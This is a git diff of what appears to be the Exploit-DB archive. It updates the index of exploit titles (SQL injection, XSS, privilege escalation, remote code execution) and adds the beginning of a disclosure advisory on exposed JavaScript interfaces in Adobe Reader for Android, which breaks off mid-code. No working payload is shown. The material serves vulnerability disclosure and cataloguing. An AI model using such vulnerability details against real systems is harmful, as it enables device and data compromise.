diff --git a/files.csv b/files.csv index c9e27942e..d5a18f600 100755 --- a/files.csv +++ b/files.csv @@ -8181,7 +8181,7 @@ id,file,description,date,author,platform,type,port 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling Vulnerability",2009-05-14,G4N0K,php,webapps,0 8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0 8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0 -8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0 +8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2009-05-14,YEnH4ckEr,php,webapps,0 8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 (arch.php arch) - Local File Inclusion Vulnerability",2009-05-14,Kacper,php,webapps,0 8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 LFI / Remote Command Execution Exploit",2009-05-14,[AVT],php,webapps,0 @@ -16149,7 +16149,7 @@ id,file,description,date,author,platform,type,port 18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 -18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 +18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow',",2012-04-04,metasploit,windows,remote,0 @@ -22008,7 +22008,7 @@ id,file,description,date,author,platform,type,port 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 -24872,platforms/windows/local/24872.txt,"Photodex ProShow Producer 5.0.3310 ScsiAccess - Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 +24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,metasploit,windows,remote,0 @@ -29470,7 +29470,7 @@ id,file,description,date,author,platform,type,port 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0 32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0 32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0 -32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0 +32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck v1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0 32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0 32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 @@ -29483,7 +29483,7 @@ id,file,description,date,author,platform,type,port 32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0 32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0 32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0 -32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,"Mayank Kapoor",php,webapps,0 +32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0 32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0 32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 'login.php' SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0 32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector Directory Traversal",2014-04-07,metasploit,windows,remote,8080 @@ -29530,9 +29530,11 @@ id,file,description,date,author,platform,type,port 32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0 32769,platforms/php/remote/32769.php,"PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0 32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 +32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta ",windows,local,0 32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 '.m3u' File Heap Buffer Overflow Vulnerability",2009-02-03,zer0in,windows,dos,0 32773,platforms/php/webapps/32773.txt,"Simple Machines Forum <= 1.1.7 '[url]' Tag HTML Injection Vulnerability",2009-02-03,Xianur0,php,webapps,0 32774,platforms/multiple/dos/32774.txt,"QIP 2005 Malformed Rich Text Message Remote Denial of Service Vulnerability",2009-02-04,ShineShadow,multiple,dos,0 +32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service Vulnerability",2009-02-16,"Sami Liedes",linux,dos,0 32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0 32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 Administration Settings Authentication Bypass Vulnerability",2009-02-04,make0day,php,webapps,0 32778,platforms/windows/local/32778.pl,"Password Door 8.4 Local Buffer Overflow Vulnerability",2009-02-05,b3hz4d,windows,local,0 @@ -29545,7 +29547,7 @@ id,file,description,date,author,platform,type,port 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,metasploit,unix,remote,443 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80 -32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL Information Leak Exploit",2014-04-10,prdelka,multiple,remote,443 +32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit",2014-04-10,prdelka,multiple,remote,443 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32793,platforms/windows/local/32793.rb,"MS14-017 Microsoft Word RTF Object Confusion",2014-04-10,metasploit,windows,local,0 32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,metasploit,php,remote,80 @@ -29554,9 +29556,113 @@ id,file,description,date,author,platform,type,port 32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 'Login.asp' Multiple SQL Injection Vulnerabilities",2009-02-10,"Francesco Bianchino",asp,webapps,0 32798,platforms/multiple/remote/32798.pl,"ProFTPD 1.3 'mod_sql' Username SQL Injection Vulnerability",2009-02-10,AlpHaNiX,multiple,remote,0 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 +32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer 'realm' Parameter Cross Site Scripting Vulnerability",2009-02-05,"Jan Skovgren",hardware,remote,0 32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 'dwnld.php' Directory Traversal Vulnerability",2009-02-16,JIKO,php,webapps,0 32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar 'eventid' Parameter SQL Injection Vulnerability",2008-10-01,r45c4l,php,webapps,0 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 'phpbb_root_path' Parameter Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability",2009-02-20,"Clément Lecigne",linux,local,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia 'index.php' Local File Include Vulnerability",2009-02-22,PLATEN,php,webapps,0 +32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability",2009-02-23,"Salvatore Fresta",php,webapps,0 +32808,platforms/php/webapps/32808.txt,"Magento 1.2 app/code/core/Mage/Admin/Model/Session.php login[username] Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32809,platforms/php/webapps/32809.txt,"Magento 1.2 app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32810,platforms/php/webapps/32810.txt,"Magento 1.2 downloader/index.php URL XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution Vulnerability",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 +32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 +32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection Vulnerability",2014-04-11,delme,php,webapps,0 +32815,platforms/linux/local/32815.c,"Linux Kernel 2.6.x Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness",2009-02-25,"Chris Evans",linux,local,0 +32816,platforms/php/webapps/32816.txt,"Orooj CMS 'news.php' SQL Injection Vulnerability",2009-02-25,Cru3l.b0y,php,webapps,0 +32817,platforms/osx/dos/32817.txt,"Apple Safari 4 Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service Vulnerability",2009-02-25,Trancer,osx,dos,0 +32818,platforms/java/webapps/32818.txt,"JOnAS 4.10.3 'select' Parameter Error Page Cross Site Scripting Vulnerability",2009-02-25,"Digital Security Research Group",java,webapps,0 +32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 'index.php' SQL Injection Vulnerability",2009-02-26,Cru3l.b0y,php,webapps,0 +32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x PKCS#11 Implementation Unauthorized Access Vulnerability",2009-02-26,"Andreas Jellinghaus",linux,local,0 +32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2009-02-26,"Digital Security Research Group",java,webapps,0 +32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 +32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 Language File Parsing Buffer Overflow Vulnerability",2009-02-27,"musashi karak0rsan",windows,dos,0 +32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning Vulnerability",2009-02-27,"Matthew Dempsky",linux,remote,0 +32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite Vulnerability",2009-03-02,"Amir Zangeneh",windows,remote,0 +32827,platforms/php/webapps/32827.txt,"Afian 'includer.php' Directory Traversal Vulnerability",2009-03-02,vnbrain.net,php,webapps,0 +32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 Multiple Cross Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 +32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x 'seccomp' System Call Security Bypass Vulnerability",2009-03-02,"Chris Evans",linux,local,0 +32830,platforms/php/webapps/32830.txt,"CubeCart 5.2.8 - Session Fixation",2014-04-13,absane,php,webapps,0 +32831,platforms/php/webapps/32831.txt,"Microweber CMS 0.93 - CSRF Vulnerability",2014-04-13,sajith,php,webapps,0 +32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 'DtbClsLogin()' Remote Stack Buffer Overflow Vulnerability",2009-03-02,"AbdulAziz Hariri",windows,remote,0 +32833,platforms/asp/webapps/32833.txt,"Blogsa 1.0 'Widgets.aspx' Cross Site Scripting Vulnerability",2009-03-02,DJR,asp,webapps,0 +32834,platforms/linux/remote/32834.txt,"cURL/libcURL <= 7.19.3 HTTP 'Location:' Redirect Security Bypass Vulnerability",2009-03-03,"David Kierznowski",linux,remote,0 +32835,platforms/php/webapps/32835.txt,"NovaBoard 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2009-03-03,"Jose Luis Zayas",php,webapps,0 +32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x Nested 'window.print()' Denial of Service Vulnerability",2009-03-03,b3hz4d,multiple,dos,0 +32837,platforms/linux/remote/32837.py,"Wesnoth 1.x PythonAI Remote Code Execution Vulnerability",2009-02-25,Wesnoth,linux,remote,0 +32838,platforms/linux/dos/32838.txt,"MySQL <= 6.0.9 XPath Expression Remote Denial Of Service Vulnerability",2009-02-14,"Shane Bester",linux,dos,0 +32839,platforms/multiple/remote/32839.txt,"IBM WebSphere Application Server 6.1/7.0 Administrative Console Cross Site Scripting Vulnerability",2009-02-26,IBM,multiple,remote,0 +32840,platforms/php/webapps/32840.txt,"Amoot Web Directory Password Field SQL Injection Vulnerability",2009-03-05,Pouya_Server,php,webapps,0 +32841,platforms/php/webapps/32841.txt,"CMSCart 1.04 'maindatafunctions.php' SQL Injection Vulnerability",2009-02-28,"John Martinelli",php,webapps,0 +32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 'fields_filter' Parameter Cross Site Scripting Vulnerability",2009-03-06,"Dmitriy Evteev",php,webapps,0 +32843,platforms/php/webapps/32843.txt,"TinX CMS 3.5 'rss.php' SQL Injection Vulnerability",2009-03-06,"Dmitriy Evteev",php,webapps,0 +32844,platforms/php/webapps/32844.txt,"PHORTAIL 1.2.1 'poster.php' Multiple HTML Injection Vulnerabilities",2009-03-09,"Jonathan Salwan",php,webapps,0 +32845,platforms/windows/local/32845.pl,"IBM Director 5.20 CIM Server Privilege Escalation Vulnerability",2009-03-10,"Bernhard Mueller",windows,local,0 +32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 'ID' Cookie SQL Injection Vulnerability",2009-03-10,x0r,php,webapps,0 +32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 Low Cost Function Information Disclosure Vulnerability",2009-03-10,"Andres Freund",multiple,local,0 +32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0 +32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0 +32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0 +32851,platforms/windows/remote/32851.html,"MS14-012 Internet Explorer CMarkup Use-After-Free",2014-04-14,"Jean-Jamil Khalife",windows,remote,0 +32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 +32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 +32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 +32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 +32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 +32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0 +32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentification Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0 +32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service Vulnerability",2009-03-31,"SCS team",java,dos,0 +32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0 +32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 'command.shtml' Cross Site Scripting Vulnerability",2009-03-31,"SCS team",java,webapps,0 +32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 'search.xml' Cross Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0 +32864,platforms/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 'UWCMain' Cross Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0 +32865,platforms/multiple/dos/32865.py,"WhatsApp < v2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0 +32866,platforms/ios/webapps/32866.txt,"PDF Album v1.7 iOS - File Include Web Vulnerability",2014-04-14,Vulnerability-Lab,ios,webapps,0 +32867,platforms/php/webapps/32867.txt,"Wordpress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 +32868,platforms/php/webapps/32868.txt,"Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 +32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console Command Injection",2014-04-14,metasploit,linux,webapps,10080 +32870,platforms/cgi/webapps/32870.txt,"AWStats <= 6.4 'awstats.pl' Multiple Path Disclosure Vulnerability",2009-04-19,r0t,cgi,webapps,0 +32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 Avtaar Name HTML Injection Vulnerability",2009-03-22,"Adam Baldwin",php,webapps,0 +32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 'notepad_body' Parameter SQL Injection Vulnerability",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0 +32873,platforms/php/webapps/32873.txt,"PHPCMS2008 'ask/search_ajax.php' SQL Injection Vulnerability",2009-03-17,anonymous,php,webapps,0 +32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 'search.aspx' Cross Site Scripting Vulnerability",2009-04-01,sk,asp,webapps,0 +32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 'product.comparision.php' SQL Injection Vulnerability",2009-03-25,SirGod,php,webapps,0 +32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0 +32877,platforms/multiple/remote/32877.txt,"Xlight FTP Server <= 3.2 'user' SQL Injection Vulnerability",2009-03-19,fla,multiple,remote,0 +32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN Cross Site Scripting Vulnerability",2009-03-31,"Bugs NotHugs",hardware,remote,0 +32879,platforms/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 'webdbm' Multiple Cross Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote,0 +32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 'keywords' Parameter Cross Site Scripting Vulnerability",2009-03-31,TEAMELITE,php,webapps,0 +32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 Malformed HTML File Remote Denial of Service Vulnerability",2009-04-01,LiquidWorm,windows,dos,0 +32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 'viewreport.asp' Cross Site Scripting Vulnerability",2009-04-02,"Bugs NotHugs",asp,webapps,0 +32883,platforms/hardware/webapps/32883.txt,"NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 +32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0 +32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE",2014-04-15,"Brandon Perry",unix,remote,443 +32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 +32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 'oscid' Session Fixation Vulnerability",2009-04-02,laurent.desaulniers,php,webapps,0 +32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0 +32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 +32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0 +32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/VISTA/2003/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 +32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 +32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 +32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 private/file_management.ssi PATH Parameter XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0 +32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 'login.asp' SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",asp,webapps,0 +32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0 +32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0 +32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0 +32904,platforms/windows/remote/32904.rb,"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",2014-04-16,metasploit,windows,remote,0 +32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 +32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 +32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 +32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 Cross Site Scripting Vulnerability",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0 +32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 User Enumeration Weakness and Multiple Cross Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0 +32910,platforms/php/webapps/32910.txt,"Phorum 5.2 admin/badwords.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 +32911,platforms/php/webapps/32911.txt,"Phorum 5.2 admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 +32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 +32913,platforms/php/webapps/32913.txt,"Phorum 5.2 versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 +32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 'usersettings.php' SQL Injection Vulnerability",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0 diff --git a/platforms/android/local/32884.txt b/platforms/android/local/32884.txt new file mode 100755 index 000000000..34c9ada96 --- /dev/null +++ b/platforms/android/local/32884.txt @@ -0,0 +1,120 @@ +------------------------------------------------------------------------ +Adobe Reader for Android exposes insecure Javascript interfaces +------------------------------------------------------------------------ +Yorick Koster, April 2014 + +------------------------------------------------------------------------ +Abstract +------------------------------------------------------------------------ +Adobe Reader for Android [2] exposes several insecure Javascript +interfaces. This issue can be exploited by opening a malicious PDF in +Adobe Reader. Exploiting this issue allows for the execution of +arbitrary Java code, which can result in a compromise of the documents +stored in Reader and files stored on SD card. + +------------------------------------------------------------------------ +Tested versions +------------------------------------------------------------------------ +This issue was successfully verified on Adobe Reader for Android +version 11.1.3. + +------------------------------------------------------------------------ +Fix +------------------------------------------------------------------------ +Adobe released version 11.2.0 of Adobe Reader that add +@JavascriptInterface [3] annotations to public methods that should be +exposed in the Javascript interfaces. In addition, the app now targets +API Level 17 and contains a static method +(shouldInitializeJavaScript()) that is used to check the device's +Android version. + +http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png +Figure 1: Adobe Reader for Android 11.2.0 release notes + +------------------------------------------------------------------------ +Introduction +------------------------------------------------------------------------ +Adobe Reader for Android allows users to work with PDF documents on an +Android tablet or phone. According to Google Play, the app is installed +on 100 million to 500 million devices. + +The following classes expose one or more Javascript interfaces: + +- ARJavaScript +- ARCloudPrintActivity +- ARCreatePDFWebView + +The app targets API Level 10, which renders the exposed Javascript +interfaces vulnerable to code execution - provided that an attacker +manages to run malicious Javascript code within Adobe Reader. + +------------------------------------------------------------------------ +PDF Javascript APIs +------------------------------------------------------------------------ +It appears that Adobe Reader for Mobile supports [4] a subset of the +Javascript for Acrobat APIs. For some reason the exposed Javscript +objects are prefixed with an underscore character. + +public class ARJavaScript +{ +[...] + + public ARJavaScript(ARViewerActivity paramARViewerActivity) + { +[...] + this.mWebView.addJavascriptInterface(new +ARJavaScriptInterface(this), +"_adobereader"); + this.mWebView.addJavascriptInterface(new +ARJavaScriptApp(this.mContext), "_app"); + this.mWebView.addJavascriptInterface(new 